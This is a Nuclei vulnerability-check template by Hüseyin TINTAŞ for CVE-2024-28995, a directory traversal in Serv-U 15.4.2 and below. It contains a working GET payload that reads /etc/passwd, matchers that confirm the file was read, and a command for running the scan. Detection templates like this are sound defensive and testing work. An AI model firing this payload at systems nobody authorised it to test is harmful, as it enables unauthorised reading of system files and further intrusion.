Checks for directory traversal vulnerability in Serv-U versions 15.4.2 and below, which allows reading sensitive files like /etc/passwd.
id: CVE-2024-28995
info:
name: Serv-U Directory Traversal Vulnerability
author: Hüseyin TINTAŞ
severity: high
description: Checks for directory traversal vulnerability in Serv-U versions 15.4.2 and below, which allows reading sensitive files like /etc/passwd.
reference:
- https://attackerkb.com/topics/2k7UrkHyl3/cve-2024-28995/rapid7-analysis
tags: pathtraversal,cve,high,serv-u
requests:
- method: GET
path:
- "{{BaseURL}}/?InternalDir=\\..\\..\\..\\..\\etc^&InternalFile=passwd"
matchers-condition: and
matchers:
- type: word
words:
- "root:x:"
- "daemon:x:"
- "bin:x:"
part: body
- type: status
status:
- 200
- type: word
words:
- "Server: Serv-U"
part: header
To use this template with Nuclei, save the template content into a file named CVE-2024-28995.yaml and run the following command:
nuclei -t CVE-2024-28995.yaml -u <target-url>Replace <target-url> with the URL of the target you want to scan.
For any inquiries or further information, you can reach out to me through: